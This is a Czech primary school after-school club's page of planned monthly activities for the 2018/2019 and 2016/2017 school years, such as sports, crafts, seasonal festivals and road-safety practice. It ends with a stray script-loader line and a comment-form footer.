Plán akcí ŠD

Výchovně vzdělávací program a vnitřní řád ŠD – 2018/2019

VVP A VNITŘNÍ ŘÁD ŠD

CELOROČNÍ PLÁN ŠKOLNÍ DRUŽINY – 2018/2019

SVĚT KOLEM NÁS 2018 – 2019

PLÁNOVANÉ CELODRUŽINOVÉ AKCE PRO ŠKOLNÍ ROK 2018 -2019

ZÁŘÍ 2018

Bezpečně do školy i ve škole

sportovní odpoledne – pohybové  a míčové hry, jízda na kole, na koloběžce

výlet na chatu Ferru – odpolední akce – účast na akci ,,Kluci v akci“ se sportováním

ŘÍJEN 2018

Podzimní tvoření z přírodnin

sportování na školní zahradě

drakiáda

lesní hry (stopovačka, šifry, hry na postřeh a zapamatování, orientace v prostoru)

LISTOPAD 2018

Výroba výrobků na vánoční jarmark

soutěž ve skoku přes švihadlo

tancování na hudbu, cvičení na jogu

soutěž v recyklohraní

PROSINEC 2018

Vánoční zvyky a tradice

pořádání čertovského karnevalu pro obec

příprava výrobků na vánoční jarmark – vánoční jarmark ve škole

hravá gymnastika

LEDEN 2019

Zima je prima – lyžujeme, bobujeme, sáňkujeme

kouzelný svět knih – návštěva místní knihovny

školní besídka pro rodiče, přátelé a občany obce 

ÚNOR 2019

Zábavné odpoledne na sněhu –  opravdová koulovačka, stavby ze sněhu

soutěž o nejhezčího sněhuláka, jízda na bobech, na saních, na lyžích

BŘEZEN 2019

Receptář prima nápadů

beseda o přírodě

sportovní hry

DUBEN 2019

Den Země – úklid v okolí školy a po obci

jarní tvořivá dílna – vyrábíme na Velikonoce

veselé čarodějnické odpoledne

sportovní pohybové hry, relaxační cvičení z jógy

KVĚTEN 2019

Dopravní výchova – bezpečně na kole –  jízda zručnosti na dopravním hřišti

výroba dárečků pro naše maminky a babičky

cesta za pokladem – stopovačka, orientace po mapě, šifrování

kreativní tvoření na zahradě

sportujeme – míčové hry, atletika

ČERVEN 2019

Den dětí – netradiční hry a soutěže

zahradní slavnost – vystoupení pro rodiče, prarodiče, přátelé a občany obce

bezpečnost o prázdninách

branný den, první pomoc

 

Celoroční plán školní družiny v jednotlivých měsících

SVĚT KOLEM NÁS 2017 – 2018

Celoroční plán školní družiny v jednotlivých měsících

SVĚT KOLEM NÁS 2016 – 2017

 

PLÁNOVANÉ CELODRUŽINOVÉ AKCE PRO ŠKOLNÍ ROK 2016 – 2017

ZÁŘÍ 2016

Bezpečně do školy i ve škole

Beseda s Martinem Zachem, Mužem roku 2009, který následkem pádu do vody ochrnul.

ŘÍJEN 2016

I.ročník – Noční stezka odvahy pohádkovým lesem, společné spaní ve družině, podzimní tvoření z přírodnin, ochrana životního prostředí.

LISTOPAD 2016

Tvoření výrobků na vánoční jarmark, sportovní soutěže, soutěž v recyklohraní

PROSINEC 2016

Vánoční zvyky a tradice, výroba vánočních ozdob a dárků, pořádání čertovského karnevalu pro obec, příprava výrobků na vánoční jarmark. Vánoční jarmark ve škole.

LEDEN 2017

Zima je prima – lyžujeme, bobujeme, sáňkujeme, bruslíme na HC stadionu Vrchlabí, návštěva knihovny v Dolním Lánově

ÚNOR 2017

Zábavné odpoledne na sněhu – opravdová koulovačka, stavby ze sněhu. Soutěž o nejhezčího sněhuláka, jízda na bobech, na saních, na lyžích, bruslíme na HC stadionu Vrchlabí

BŘEZEN 2017

Nacvičování na školní besídku, vystupování na školní besídce pro rodiče, přátelé a občany obce, jarní tvořivá dílna – vyrábíme na Velikonoce

DUBEN 2017

Jarní tvořivá dílna – vyrábíme na Velikonoce, ke Dni Země vyrábíme informační plakáty pro obec, uklízíme v okolí školy, veselé čarodějnické odpoledne plné sportovních her

KVĚTEN 2017

Dopravní výchova – bezpečně na kole – jízda zručnosti na dopravním hřišti, výroba dárečků pro naše maminky a babičky, hrajeme si, soutěžíme a tvoříme na zahradě

ČERVEN 2017

Den dětí – netradiční hry a soutěže, Zahradní slavnost – vystoupení pro rodiče, prarodiče, přátelé a občany obce, bezpečnost o prázdninách

document.currentScript.parentNode.insertBefore(s, document.currentScript);

Napsat komentář

Vaše emailová adresa nebude zveřejněna. Vyžadované informace jsou označeny *